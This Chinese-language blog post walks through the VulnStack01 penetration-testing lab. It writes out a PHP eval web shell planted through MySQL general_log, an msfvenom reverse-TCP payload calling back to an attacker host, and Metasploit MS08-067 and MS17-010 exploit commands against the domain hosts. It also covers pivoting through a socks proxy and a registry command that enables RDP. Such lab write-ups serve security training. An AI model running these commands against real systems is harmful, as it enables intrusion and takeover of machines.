<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="0x01 前置准备下载靶场镜像 Win7设置双网卡，一个仅主机一个NAT，外网IP：192.168.40.129 内网IP：192.168.52.143  Win2003\Winserver均为仅主机模式 Win2003IP:192.168.52.141 WinserverIP:192.168.52.138(DC域控) 设置之后，Win7可以ping同域内其他两台主机，而两台主机无法ping通Wi">
<meta property="og:type" content="article">
<meta property="og:title" content="VulnStack01">
<meta property="og:url" content="https://givemefivw.github.io/2022/04/09/VulnStack01/index.html">
<meta property="og:site_name" content="GMF信息小站">
<meta property="og:description" content="0x01 前置准备下载靶场镜像 Win7设置双网卡，一个仅主机一个NAT，外网IP：192.168.40.129 内网IP：192.168.52.143  Win2003\Winserver均为仅主机模式 Win2003IP:192.168.52.141 WinserverIP:192.168.52.138(DC域控) 设置之后，Win7可以ping同域内其他两台主机，而两台主机无法ping通Wi">
<meta property="og:locale">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/1.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/2.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/3.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/4.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/5.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/6.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/7.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/8.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/9.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/10.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/11.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/12.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/13.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/14.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/15.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/16.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/17.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/18.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/19.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/20.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/21.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/22.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/23.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/24.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/25.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/26.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/27.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/28.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/29.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/30.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/31.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/32.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/33.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/34.png">
<meta property="og:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/35.png">
<meta property="article:published_time" content="2022-04-09T03:16:39.000Z">
<meta property="article:modified_time" content="2022-04-09T03:19:55.919Z">
<meta property="article:author" content="givemefivw">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://givemefivw.github.io/2022/04/09/VulnStack01/1.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>VulnStack01</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Startseite</a></li><!--
     --><!--
       --><li><a href="/about/">Über diese Webseite</a></li><!--
     --><!--
       --><li><a href="/archives/">Artikel</a></li><!--
     --><!--
       --><li><a href="/projects_url">Projekte</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Vorheriger Beitrag" href="/2022/04/09/%E4%BE%A9%E5%AD%90%E6%89%8B%E2%80%94%E7%BD%91%E6%9A%B4/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Nächster Beitrag" href="/2022/03/15/Game-theory/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Zurück zum Anfang" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Beitrag teilen" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Vorheriger Beitrag</span>
      <span id="i-next" class="info" style="display:none;">Nächster Beitrag</span>
      <span id="i-top" class="info" style="display:none;">Zurück zum Anfang</span>
      <span id="i-share" class="info" style="display:none;">Beitrag teilen</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://givemefivw.github.io/2022/04/09/VulnStack01/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&text=VulnStack01"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&is_video=false&description=VulnStack01"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=VulnStack01&body=Check out this article: https://givemefivw.github.io/2022/04/09/VulnStack01/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&name=VulnStack01&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://givemefivw.github.io/2022/04/09/VulnStack01/&t=VulnStack01"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-%E5%89%8D%E7%BD%AE%E5%87%86%E5%A4%87"><span class="toc-number">1.</span> <span class="toc-text">0x01 前置准备</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-%E6%AD%A3%E5%BC%8F%E6%89%93%E9%9D%B6"><span class="toc-number">2.</span> <span class="toc-text">0x02 正式打靶</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web%E6%89%93%E7%82%B9GetShell"><span class="toc-number">2.1.</span> <span class="toc-text">Web打点GetShell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E8%8E%B7%E5%8F%96%E5%9F%9F%E6%8E%A7"><span class="toc-number">2.2.</span> <span class="toc-text">内网横向获取域控</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        VulnStack01
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">givemefivw</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-04-09T03:16:39.000Z" itemprop="datePublished">2022-04-09</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0/">技术文章</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="0x01-前置准备"><a href="#0x01-前置准备" class="headerlink" title="0x01 前置准备"></a>0x01 前置准备</h1><p>下载靶场镜像</p>
<p>Win7设置双网卡，一个仅主机一个NAT，外网IP：192.168.40.129 内网IP：192.168.52.143</p>
<p><img src="/2022/04/09/VulnStack01/1.png" alt="Untitled"></p>
<p>Win2003\Winserver均为仅主机模式</p>
<p>Win2003IP:192.168.52.141</p>
<p>WinserverIP:192.168.52.138(DC域控)</p>
<p>设置之后，Win7可以ping同域内其他两台主机，而两台主机无法ping通Win7</p>
<h1 id="0x02-正式打靶"><a href="#0x02-正式打靶" class="headerlink" title="0x02 正式打靶"></a>0x02 正式打靶</h1><h2 id="Web打点GetShell"><a href="#Web打点GetShell" class="headerlink" title="Web打点GetShell"></a>Web打点GetShell</h2><p>首先对网站进行目录扫描：</p>
<p><img src="/2022/04/09/VulnStack01/2.png" alt="Untitled"></p>
<p>可以看到我们扫描到了网站的phpMyadmin的后台，直接访问：</p>
<p><img src="/2022/04/09/VulnStack01/3.png" alt="Untitled"></p>
<p>然后通过弱密码root&#x2F;root登录数据库：</p>
<p><img src="/2022/04/09/VulnStack01/4.png" alt="Untitled"></p>
<p>搜索phpMyadmin后台GetShell方式：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/0nc3/p/12071314.html">phpmyadmin后台getshell方法学习总结</a></p>
<p>执行<code>show global variables like &#39;%secure%&#39;;</code>语句之后，结果为NULL：</p>
<p><img src="/2022/04/09/VulnStack01/5.png" alt="Untitled"></p>
<p>无法利用into_outfile方法进行getshell，尝试利用日志</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">show variables like <span class="string">&#x27;%general%&#x27;</span>;</span><br><span class="line"></span><br><span class="line">set <span class="variable language_">global</span> general_log = on;</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/6.png" alt="Untitled"></p>
<p><img src="/2022/04/09/VulnStack01/7.png" alt="Untitled"></p>
<p>接下来写入Shell：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set global general_log_file = &#x27;C:/PhpStudy2018/PHPTutorial/www/2022.php&#x27;;</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/8.png" alt="Untitled"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#x27;&lt;?php eval($_POST[cmd]);?&gt;’</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/9.png" alt="Untitled"></p>
<p>访问<code>http://192.168.40.129/2022.php</code></p>
<p>可以看到并未提示404，说明写入成功</p>
<p><img src="/2022/04/09/VulnStack01/10.png" alt="Untitled"></p>
<p>接着蚁剑连接</p>
<p><img src="/2022/04/09/VulnStack01/11.png" alt="Untitled"></p>
<p>执行命令说明成功获取Shell</p>
<p><img src="/2022/04/09/VulnStack01/12.png" alt="Untitled"></p>
<p>接着运行<strong>tasklist &#x2F;svc查看是否存在防火墙设备</strong></p>
<p><a target="_blank" rel="noopener" href="https://sr.xljtj.com/">Windows杀软在线对比辅助-心灵鸡汤君 (xljtj.com)</a></p>
<p><img src="/2022/04/09/VulnStack01/13.png" alt="Untitled"></p>
<p>查询后结果空白，说明目标主机并未安装杀软，可以直接搞事情</p>
<h2 id="内网横向获取域控"><a href="#内网横向获取域控" class="headerlink" title="内网横向获取域控"></a>内网横向获取域控</h2><p>powershell上线CS</p>
<p><img src="/2022/04/09/VulnStack01/14.png" alt="Untitled"></p>
<p>ipconfig &#x2F;all获取域控地址192.168.52.138</p>
<p><img src="/2022/04/09/VulnStack01/15.png" alt="Untitled"></p>
<p>利用自带插件获取到主机密码<code>hongrisec@2019</code></p>
<p><img src="/2022/04/09/VulnStack01/16.png" alt="Untitled"></p>
<p>再利用梼杌插件提升system权限</p>
<p><img src="/2022/04/09/VulnStack01/17.png" alt="Untitled"></p>
<p>到这里这台机器已经被拿下，接下来就是横向渗透，拿到域控权限</p>
<p>再上线MSF，可直接借助CS派生，也可直接生成木马</p>
<p><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=8888 -f exe &gt; artifact.exe</code>生成木马程序，利用CS文件上传并运行</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line">set lhost <span class="number">192.168</span><span class="number">.40</span><span class="number">.128</span></span><br><span class="line">set lport <span class="number">8888</span></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/18.png" alt="Untitled"></p>
<p>同样获取到SYSTEM权限</p>
<p>然后获取目标主机的路由信息<code>run get_local_subnets</code>，可以得到<code>192.168.52.0/24</code></p>
<p><img src="/2022/04/09/VulnStack01/19.png" alt="Untitled"></p>
<p>之后将路由添加msf，并扫描域内其他存活主机</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -s <span class="number">192.168</span><span class="number">.52</span><span class="number">.0</span>/<span class="number">24</span></span><br><span class="line"></span><br><span class="line">run post/windows/gather/arp_scanner <span class="variable constant_">RHOSTS</span>=<span class="number">192.168</span><span class="number">.52</span><span class="number">.0</span>/<span class="number">24</span></span><br></pre></td></tr></table></figure>

<p>得到另外两台存活主机：192.168.52.138（域控）、1292.168.52.141</p>
<p><img src="/2022/04/09/VulnStack01/20.png" alt="Untitled"></p>
<p>接下来就需要对存活主机进行端口扫描</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/portscan/tcp</span><br><span class="line"></span><br><span class="line">set rhosts <span class="number">192.168</span><span class="number">.52</span><span class="number">.138</span>/<span class="number">141</span></span><br><span class="line"></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/21.png" alt="Untitled"></p>
<p><img src="/2022/04/09/VulnStack01/22.png" alt="Untitled"></p>
<p>可以看到两台主机均开放了445端口</p>
<p>接下来使用smb探测模块进行扫描</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br><span class="line"></span><br><span class="line">set rhosts <span class="number">192.168</span><span class="number">.52</span><span class="number">.138</span>/<span class="number">141</span></span><br><span class="line"></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/23.png" alt="Untitled"></p>
<p>可以看到结果显示两台主机均存在MS17-010漏洞</p>
<p>利用结果，显示两台主机ip</p>
<p><img src="/2022/04/09/VulnStack01/24.png" alt="Untitled"></p>
<p><img src="/2022/04/09/VulnStack01/25.png" alt="Untitled"></p>
<p>但是到这里不知道为什么使用17010和08067都未利用成功，靶机打挂好几次。</p>
<p><img src="/2022/04/09/VulnStack01/26.png" alt="Untitled"></p>
<p>但是17010可以执行命令：</p>
<p><img src="/2022/04/09/VulnStack01/27.png" alt="Untitled"></p>
<p>可以看到其实已经是system权限，蛋疼的就是不知道为啥无法获取Shell</p>
<p>&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;更新&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</p>
<p>换用msf旧版本，重新启用socks代理</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/server/socks4a </span><br><span class="line">set srvhost <span class="number">192.168</span><span class="number">.40</span><span class="number">.130</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/28.png" alt="Untitled"></p>
<p>然后修改proxychains配置文件</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains nmap -sT -sV -<span class="title class_">Pn</span> -n -p22,<span class="number">80</span>,<span class="number">135</span>,<span class="number">139</span>,<span class="number">445</span> --script=smb-vuln-ms17-<span class="number">010</span>.<span class="property">nse</span> <span class="number">192.168</span><span class="number">.52</span><span class="number">.138</span>/<span class="number">141</span></span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/29.png" alt="Untitled"></p>
<p>现在已经可以扫描到域内主机了</p>
<p>然后再使用ms08_067，这次直接获取：</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/ms08_067_netapi</span><br><span class="line"></span><br><span class="line">set rhost <span class="number">192.168</span><span class="number">.52</span><span class="number">.141</span></span><br><span class="line"></span><br><span class="line">set payload windows/meterpreter/bind_tcp</span><br><span class="line"></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/30.png" alt="Untitled"></p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/smb/ms17_010_psexec</span><br><span class="line"></span><br><span class="line">set rhosts <span class="number">192.168</span><span class="number">.52</span><span class="number">.138</span></span><br><span class="line"></span><br><span class="line">set payload windows/meterpreter/bind_tcp</span><br><span class="line"></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/31.png" alt="Untitled"></p>
<p>OK,接下来直接开启3389</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable constant_">REG</span> <span class="variable constant_">ADD</span> <span class="variable constant_">HKLM</span>\\<span class="variable constant_">SYSTEM</span>\\<span class="title class_">CurrentControlSet</span>\\<span class="title class_">Control</span>\\<span class="title class_">Terminal</span><span class="string">&quot; &quot;</span><span class="title class_">Server</span> /v fDenyTSConnections /t <span class="variable constant_">REG_DWORD</span> /d <span class="number">00000000</span> /f</span><br></pre></td></tr></table></figure>

<p><img src="/2022/04/09/VulnStack01/32.png" alt="Untitled"></p>
<p>直接登录<code>proxychains rdesktop 192.168.52.138</code></p>
<p><img src="/2022/04/09/VulnStack01/33.png" alt="Untitled"></p>
<p><img src="/2022/04/09/VulnStack01/34.png" alt="Untitled"></p>
<p>这里就已经可以远程登录了，前提是新建用户或者知道密码</p>
<p>最终成果三台主机均已上线，均为SYSTEM权限</p>
<p><img src="/2022/04/09/VulnStack01/35.png" alt="Untitled"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Startseite</a></li>
         
          <li><a href="/about/">Über diese Webseite</a></li>
         
          <li><a href="/archives/">Artikel</a></li>
         
          <li><a href="/projects_url">Projekte</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-%E5%89%8D%E7%BD%AE%E5%87%86%E5%A4%87"><span class="toc-number">1.</span> <span class="toc-text">0x01 前置准备</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-%E6%AD%A3%E5%BC%8F%E6%89%93%E9%9D%B6"><span class="toc-number">2.</span> <span class="toc-text">0x02 正式打靶</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web%E6%89%93%E7%82%B9GetShell"><span class="toc-number">2.1.</span> <span class="toc-text">Web打点GetShell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E8%8E%B7%E5%8F%96%E5%9F%9F%E6%8E%A7"><span class="toc-number">2.2.</span> <span class="toc-text">内网横向获取域控</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://givemefivw.github.io/2022/04/09/VulnStack01/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&text=VulnStack01"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&is_video=false&description=VulnStack01"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=VulnStack01&body=Check out this article: https://givemefivw.github.io/2022/04/09/VulnStack01/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&title=VulnStack01"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://givemefivw.github.io/2022/04/09/VulnStack01/&name=VulnStack01&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://givemefivw.github.io/2022/04/09/VulnStack01/&t=VulnStack01"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menü</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Teilen</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Nach oben</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2022
    givemefivw
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Startseite</a></li><!--
     --><!--
       --><li><a href="/about/">Über diese Webseite</a></li><!--
     --><!--
       --><li><a href="/archives/">Artikel</a></li><!--
     --><!--
       --><li><a href="/projects_url">Projekte</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"In die Zwischenablage kopiert!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Kopiert!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
